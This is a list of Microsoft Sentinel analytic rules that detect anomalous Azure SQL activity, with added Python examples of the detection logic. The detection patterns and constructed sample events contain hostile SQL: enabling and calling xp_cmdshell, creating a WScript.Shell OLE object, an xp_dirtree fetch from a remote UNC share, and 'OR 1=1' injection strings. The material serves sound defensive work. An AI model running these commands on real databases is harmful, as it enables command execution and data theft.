Microsoft Sentinel Analytic Rules

Affected rows stateful anomaly on database

Id: 2a632013-379d-4993-956f-615063d31e10
Rulename: Affected rows stateful anomaly on database
Description: Goal: to detect anomalous data change or deletion. This query detects SQL queries that changed or deleted a large number of rows, significantly more than is normal for this database. The detection is calculated inside a recent time window (defined by the 'detectionWindow' parameter), and the anomaly is scored against the preceding training window (defined by the 'trainingWindow' parameter). The user can set the minimal threshold for an anomaly by changing the threshold parameters volThresholdZ and volThresholdQ (a higher threshold will detect only more severe anomalies).

Credential errors stateful anomaly on database

Id: daa32afa-b5b6-427d-93e9-e32f3f359dd7
Rulename: Credential errors stateful anomaly on database
Description: This query detects batches of distinct SQL queries that failed with error codes that might indicate malicious attempts to gain illegitimate access to the data. During a brute-force attack the majority of logins use wrong credentials and therefore fail with error code 18456, so a large number of logins failing with this error code can indicate a brute-force attack.

Drop attempts stateful anomaly on database

Id: 237c3855-138c-4588-a68f-b870abd3bfc9
Rulename: Drop attempts stateful anomaly on database
Description: This query detects batches of distinct SQL queries that execute (or attempt to execute) commands that could indicate potential security issues, such as attempts to drop tables or databases (e.g. for data vandalism).
Severity: Medium
Tactics: InitialAccess
Techniques: T1190
Required data connectors: AzureSql
Kind: Scheduled
Query frequency: 1h
Query period: 14d
Trigger threshold: 0
Trigger operator: gt
Source Uri: https://github.

Execution attempts stateful anomaly on database

Id: 3367fd5e-44b3-4746-a9a5-dc15c8202490
Rulename: Execution attempts stateful anomaly on database
Description: This query detects batches of distinct SQL queries that execute (or attempt to execute) commands that could indicate potential security issues, such as attempts to execute shell commands (e.g. for running illegitimate code).
Severity: Medium
Tactics: InitialAccess
Techniques: T1190
Required data connectors: AzureSql
Kind: Scheduled
Query frequency: 1h
Query period: 14d
Trigger threshold: 0
Trigger operator: gt
Source Uri: https://github.

Firewall errors stateful anomaly on database

Id: 20f87813-3de0-4a9f-a8c0-6aaa3187be08
Rulename: Firewall errors stateful anomaly on database
Description: This query detects batches of distinct SQL queries that failed with error codes that might indicate malicious attempts to gain illegitimate access to the data. When an attacker attempts to scan or gain access to a server protected by the firewall, the connection is blocked by the firewall and fails with error code 40615. Thus, if we see a large number of logins failing with this error code, this could indicate attempts to gain access.

Firewall rule manipulation attempts stateful anomaly on database

Id: 05030ca6-ef66-42ca-b672-2e84d4aaf5d7
Rulename: Firewall rule manipulation attempts stateful anomaly on database
Description: This query detects batches of distinct SQL queries that execute (or attempt to execute) commands that could indicate potential security issues, such as attempts to manipulate firewall rules (e.g. for allowing malicious access to the database).
Severity: Medium
Tactics: InitialAccess
Techniques: T1190
Required data connectors: AzureSql
Kind: Scheduled
Query frequency: 1h
Query period: 14d
Trigger threshold: 0
Trigger operator: gt
Source Uri: https://github.

OLE object manipulation attempts stateful anomaly on database

Id: dabd7284-004b-4237-b5ee-a22acab19eb2
Rulename: OLE object manipulation attempts stateful anomaly on database
Description: This query detects batches of distinct SQL queries that execute (or attempt to execute) commands that could indicate potential security issues, such as attempts to manipulate OLE objects (e.g. for running malicious commands).
Severity: Medium
Tactics: InitialAccess
Techniques: T1190
Required data connectors: AzureSql
Kind: Scheduled
Query frequency: 1h
Query period: 14d
Trigger threshold: 0
Trigger operator: gt
Source Uri: https://github.

Outgoing connection attempts stateful anomaly on database

Id: c105513d-e398-4a02-bd91-54b9b2d6fa7d
Rulename: Outgoing connection attempts stateful anomaly on database
Description: This query detects batches of distinct SQL queries that execute (or attempt to execute) commands that could indicate potential security issues, such as attempts to access external sites or resources (e.g. for downloading malicious content).
Severity: Medium
Tactics: InitialAccess
Techniques: T1190
Required data connectors: AzureSql
Kind: Scheduled
Query frequency: 1h
Query period: 14d
Trigger threshold: 0
Trigger operator: gt
Source Uri: https://github.
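The five statement-based rules above (Drop, Execution, Firewall rule manipulation, OLE object manipulation and Outgoing connection attempts) share one shape: tag each audited statement with a suspicious family, count distinct statements per database, family and hour, and compare the detection hour with the training window. The Python below is an added example of that logic, not the rules' own KQL (which run as scheduled queries over the AzureSql connector). The regexes, the input columns, the example statements and the "busiest hour in the last 14 days" baseline are this example's assumptions; the sample audit rows are constructed.

```python
"""Batching of suspicious statements for the drop / execution / firewall-rule /
OLE / outgoing-connection rules (added example, not the rules' KQL)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Set, Tuple

# Illustrative patterns per rule family; assumptions of this example, tune to your estate.
SUSPICIOUS = {
    "drop":      re.compile(r"\bDROP\s+(TABLE|DATABASE|SCHEMA)\b", re.I),
    "execution": re.compile(r"\b(xp_cmdshell|sp_execute_external_script)\b", re.I),
    "firewall":  re.compile(r"\bsp_(set|delete)_(database_)?firewall_rule\b", re.I),
    "ole":       re.compile(r"\bsp_OA(Create|Method|GetProperty|SetProperty|Destroy)\b", re.I),
    # remote data-access procedures, or a UNC path embedded in the statement
    "outgoing":  re.compile(r"\b(OPENROWSET|OPENDATASOURCE|xp_dirtree|xp_fileexist)\b|\\\\[\w.-]+\\", re.I),
}
DETECTION_WINDOW = timedelta(hours=1)   # the rules' 1h query frequency
TRAINING_WINDOW = timedelta(days=14)    # the rules' 14d query period

Batches = Dict[Tuple[str, str, datetime], Set[str]]


def floor_hour(ts: datetime) -> datetime:
    return ts.replace(minute=0, second=0, microsecond=0)


def classify(statement: str) -> List[str]:
    """Every family the statement matches (one statement can hit several)."""
    return [name for name, rx in SUSPICIOUS.items() if rx.search(statement)]


def normalize(statement: str) -> str:
    """Case and whitespace only: literals stay, so two xp_cmdshell calls with
    different arguments remain two distinct attempts."""
    return " ".join(statement.split()).lower()


def batch_suspicious(events) -> Batches:
    """events: (timestamp, database, principal, statement) per audited statement.
    Returns the set of distinct suspicious statements per (database, family, hour)."""
    out: Batches = defaultdict(set)
    for ts, db, _principal, stmt in events:
        for family in classify(stmt):
            out[(db, family, floor_hour(ts))].add(normalize(stmt))
    return out


def stateful_flags(batches: Batches, now: datetime) -> Dict[Tuple[str, str], dict]:
    """Flag a family whose distinct count in the detection hour exceeds the busiest
    hour of the training window (assumed baseline; a z-score works the same way)."""
    det_start = floor_hour(now - DETECTION_WINDOW)
    train_start = det_start - TRAINING_WINDOW
    flags = {}
    for (db, family, b), stmts in batches.items():
        if b != det_start:
            continue
        history = [len(s) for (d, f, tb), s in batches.items()
                   if d == db and f == family and train_start <= tb < det_start]
        baseline = max(history, default=0)
        if len(stmts) > baseline:
            flags[(db, family)] = {"distinct": len(stmts), "baseline_max": baseline,
                                   "statements": sorted(stmts)}
    return flags


def constructed_events(now: datetime):
    """Constructed sample: an hourly ETL job that drops a staging table for two
    weeks, then one session chaining xp_cmdshell, OLE automation and a UNC fetch."""
    det_start = floor_hour(now - DETECTION_WINDOW)

    def at(minutes: int) -> datetime:
        return det_start + timedelta(minutes=minutes)

    ev = []
    for i in range(24 * 14):
        ts = det_start - timedelta(hours=i + 1) + timedelta(minutes=5)
        ev.append((ts, "orders", "etl_svc", "DROP TABLE dbo.staging_orders"))
        ev.append((ts, "orders", "etl_svc", "INSERT INTO dbo.orders SELECT * FROM dbo.staging_orders"))
    ev += [
        (at(3),  "orders", "etl_svc",  "DROP TABLE dbo.staging_orders"),                      # routine
        (at(10), "orders", "app_user", "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"),
        (at(11), "orders", "app_user", "EXEC master..xp_cmdshell 'whoami'"),
        (at(12), "orders", "app_user", "EXEC master..xp_cmdshell 'net user'"),
        (at(15), "orders", "app_user", "DECLARE @o INT; EXEC sp_OACreate 'WScript.Shell', @o OUT;"),
        (at(20), "orders", "app_user", r"EXEC xp_dirtree '\\203.0.113.9\share', 1, 1"),
        (at(25), "orders", "app_user", "SELECT TOP 10 * FROM dbo.orders"),                    # benign
    ]
    return ev


if __name__ == "__main__":
    now = datetime(2024, 1, 15, 12, 0)
    for key, v in sorted(stateful_flags(batch_suspicious(constructed_events(now)), now).items()):
        print(key, v)
```

Run as-is, the routine DROP of the staging table is not flagged because every hour of the training window already contains one distinct DROP, while the execution, OLE and outgoing families are flagged against a baseline of zero. Counting distinct statements rather than raw events is what keeps a retried job from looking like a burst.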

Response rows stateful anomaly on database

Id: 9851c360-5fd5-4bae-a117-b66d8476bf5e
Rulename: Response rows stateful anomaly on database
Description: Goal: to detect anomalous data exfiltration. This query detects SQL queries that accessed a large number of rows, significantly more than is normal for this database. The calculation is made inside a recent time window (defined by the 'detectionWindow' parameter), and the anomaly is scored against the preceding training window (defined by the 'trainingWindow' parameter). The user can set the minimal threshold for an anomaly by changing the threshold parameters volThresholdZ and volThresholdQ (higher thresholds will detect only more severe anomalies).
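The Affected rows and Response rows rules use the same two-window scoring: sum the rows touched per database inside the detection window, build a baseline from the training window, and alert only when both a z-score (volThresholdZ) and a quantile-based score (volThresholdQ) clear their thresholds. The Python below is an added stand-alone model of that scoring, not the rules' KQL. The exact formulas, the AND between the two scores, the MIN_ROWS floor, the threshold values and the input columns are assumptions of this example, and the history it scores is constructed.

```python
"""Stateful volume anomaly for the 'Affected rows' / 'Response rows' rules
(added example, not the rules' KQL)."""
from datetime import datetime, timedelta
from statistics import mean, pstdev
from typing import Dict, List, Tuple

DETECTION_WINDOW = timedelta(hours=1)   # the rules' 1h query frequency
TRAINING_WINDOW = timedelta(days=14)    # the rules' 14d query period
VOL_THRESHOLD_Z = 5.0                   # assumed values; raise them to keep only severe spikes
VOL_THRESHOLD_Q = 5.0
MIN_ROWS = 1000                         # assumed floor so tiny databases do not alert on noise
MIN_TRAINING_BINS = 24                  # assumed: refuse to score with under a day of history


def floor_hour(ts: datetime) -> datetime:
    return ts.replace(minute=0, second=0, microsecond=0)


def percentile(values: List[int], p: float) -> float:
    """Nearest-rank percentile; enough for a baseline without numpy."""
    s = sorted(values)
    return float(s[round(p * (len(s) - 1))])


def score(training: List[int], observed: int) -> Tuple[float, float]:
    """z: distance from the training mean in standard deviations.
    q: distance above the 95th percentile in units of the p50..p95 spread, which
    a few large historical values do not inflate the way they inflate the stdev."""
    mu, sigma = mean(training), pstdev(training)
    if sigma == 0:
        z = float("inf") if observed > mu else 0.0
    else:
        z = (observed - mu) / sigma
    p50, p95 = percentile(training, 0.50), percentile(training, 0.95)
    q = (observed - p95) / max(p95 - p50, 1.0)   # floor the spread so flat baselines still score
    return z, q


def detect(events, now: datetime) -> Dict[str, dict]:
    """events: (timestamp, database, rows) per audited statement.
    Returns a verdict per database for the hour bin ending at `now`."""
    bins: Dict[Tuple[str, datetime], int] = {}
    for ts, db, rows in events:
        key = (db, floor_hour(ts))
        bins[key] = bins.get(key, 0) + rows
    det_start = floor_hour(now - DETECTION_WINDOW)
    train_start = det_start - TRAINING_WINDOW
    verdicts = {}
    for db in {d for d, _ in bins}:
        # Hours with no audited statements are absent rather than zero, which biases
        # the baseline upward: the conservative direction for an alerting rule.
        training = [v for (d, b), v in bins.items() if d == db and train_start <= b < det_start]
        if len(training) < MIN_TRAINING_BINS:
            continue
        observed = bins.get((db, det_start), 0)
        z, q = score(training, observed)
        verdicts[db] = {
            "rows": observed, "z": round(z, 2), "q": round(q, 2),
            "anomalous": observed >= MIN_ROWS and z >= VOL_THRESHOLD_Z and q >= VOL_THRESHOLD_Q,
        }
    return verdicts


def constructed_events(now: datetime):
    """Constructed sample: two weeks of hourly history, then one mass update."""
    det_start = floor_hour(now - DETECTION_WINDOW)
    events = []
    for i in range(24 * 14):
        ts = det_start - timedelta(hours=i + 1)
        events.append((ts, "orders", 150 + (i * 37) % 100))   # normally 150..249 rows/hour
        events.append((ts, "hr", 20 + (i * 11) % 30))         # normally 20..49 rows/hour
    events.append((det_start + timedelta(minutes=12), "orders", 9000))  # mass update/delete
    events.append((det_start + timedelta(minutes=40), "hr", 25))        # business as usual
    return events


if __name__ == "__main__":
    now = datetime(2024, 1, 15, 12, 0)
    for db, v in sorted(detect(constructed_events(now), now).items()):
        print(db, v)
```

Requiring both scores is the conservative choice: the z-score alone is easy to blow up on a database whose history is nearly flat, and the quantile score alone ignores how unusual the spike is relative to the full spread. Swapping the AND for an OR makes the detector more sensitive at the cost of more tuning work on volThresholdZ and volThresholdQ.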

Syntax errors stateful anomaly on database

Id: c815008d-f4d1-4645-b13b-8b4bc188d5de
Rulename: Syntax errors stateful anomaly on database
Description: This query detects batches of distinct SQL queries that failed with error codes that might indicate malicious attempts to gain illegitimate access to the data. When blind attacks are performed (such as SQL injection or fuzzing), the attempted queries are often malformed and fail on wrong syntax (error 102) or wrong escaping (error 105). Thus, if a large number of different queries fail on such errors in a short amount of time, this might indicate an attempted attack.
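The three error-code rules (Credential errors with 18456, Firewall errors with 40615, Syntax errors with 102/105) differ in what they count: a brute-force attempt is many failed logins, so the raw count per client address matters; a blind injection or fuzzing run is many different malformed statements from one identity, so the distinct count is what matters. The Python below is an added example of that batching over constructed audit rows; it is not the rules' KQL. The XML-style additional_information field it parses, the column order, the fixed per-hour minimums and the sample traffic are all assumptions of this example (the rules derive their baseline from the training window instead of a fixed minimum).

```python
"""Error-code batching for the credential / firewall / syntax error rules
(added example, not the rules' KQL)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Optional, Tuple

# Error codes named by the rules: 18456 login failed, 40615 client address blocked by
# the server firewall, 102 incorrect syntax, 105 unclosed quotation mark.
ERROR_CATEGORY = {18456: "credential", 40615: "firewall", 102: "syntax", 105: "syntax"}

# Per-hour minimums below which nothing is reported (assumed values for the example).
MIN_TOTAL = {"credential": 20, "firewall": 10}   # raw failures per client address
MIN_DISTINCT = {"syntax": 10}                    # distinct failed statements per principal

ERROR_RX = re.compile(r"<error_code>(\d+)</error_code>")


def floor_hour(ts: datetime) -> datetime:
    return ts.replace(minute=0, second=0, microsecond=0)


def parse_error_code(additional_information: str) -> Optional[int]:
    """Extract the numeric error code; the <error_code> element is this example's
    assumed shape for the audit record's additional_information field."""
    m = ERROR_RX.search(additional_information or "")
    return int(m.group(1)) if m else None


def failed_batches(events) -> Dict[Tuple[str, str, datetime], dict]:
    """events: (timestamp, client_ip, principal, statement, succeeded, additional_information).
    Groups failures per (category, key, hour), keeping a raw count and a distinct-statement set."""
    out = defaultdict(lambda: {"total": 0, "distinct": set()})
    for ts, ip, principal, stmt, succeeded, info in events:
        if succeeded:
            continue
        category = ERROR_CATEGORY.get(parse_error_code(info))
        if category is None:
            continue
        key = principal if category == "syntax" else ip   # who is probing vs. where from
        rec = out[(category, key, floor_hour(ts))]
        rec["total"] += 1
        rec["distinct"].add(" ".join(stmt.split()).lower())
    return out


def evaluate(batches) -> Dict[Tuple[str, str, datetime], dict]:
    """Apply the per-category minimum to the right measure."""
    hits = {}
    for key, rec in batches.items():
        category = key[0]
        distinct = len(rec["distinct"])
        if category in MIN_TOTAL and rec["total"] >= MIN_TOTAL[category]:
            hits[key] = {"total": rec["total"], "distinct": distinct}
        elif category in MIN_DISTINCT and distinct >= MIN_DISTINCT[category]:
            hits[key] = {"total": rec["total"], "distinct": distinct}
    return hits


def constructed_events(now: datetime):
    """Constructed hour of traffic: a password spray, one admin typo, a scanner
    rejected by the server firewall, and an injection probe from an app identity."""
    start = floor_hour(now - timedelta(hours=1))

    def info(code: int) -> str:
        return f"<action_info><error_code>{code}</error_code></action_info>"

    ev = []
    for i in range(30):   # 30 failed logins from one address, rotating usernames
        ev.append((start + timedelta(minutes=i), "203.0.113.9", f"user{i % 5}", "", False, info(18456)))
    ev.append((start + timedelta(minutes=7), "10.0.0.4", "dba_admin", "", False, info(18456)))
    for i in range(12):   # 12 connections blocked before authentication
        ev.append((start + timedelta(minutes=i * 4), "198.51.100.7", "", "", False, info(40615)))
    for i in range(15):   # 15 different malformed statements, alternating 102/105
        stmt = f"SELECT name FROM users WHERE id = '{i}'' OR 1=1 --"
        ev.append((start + timedelta(minutes=20 + i), "10.0.0.8", "app_user", stmt, False,
                   info(102 if i % 2 else 105)))
    ev.append((start + timedelta(minutes=30), "10.0.0.8", "app_user",
               "SELECT name FROM users WHERE id = @id", True, ""))
    return ev


if __name__ == "__main__":
    now = datetime(2024, 1, 15, 12, 0)
    for key, v in sorted(evaluate(failed_batches(constructed_events(now))).items()):
        print(key, v)
```

Note what the output shows for the spray: total 30 but distinct 1, because login failures carry no statement. That is exactly why the credential and firewall rules key on raw volume per source while the syntax rule keys on distinct statements; applying the syntax measure to 18456 would hide the brute force entirely.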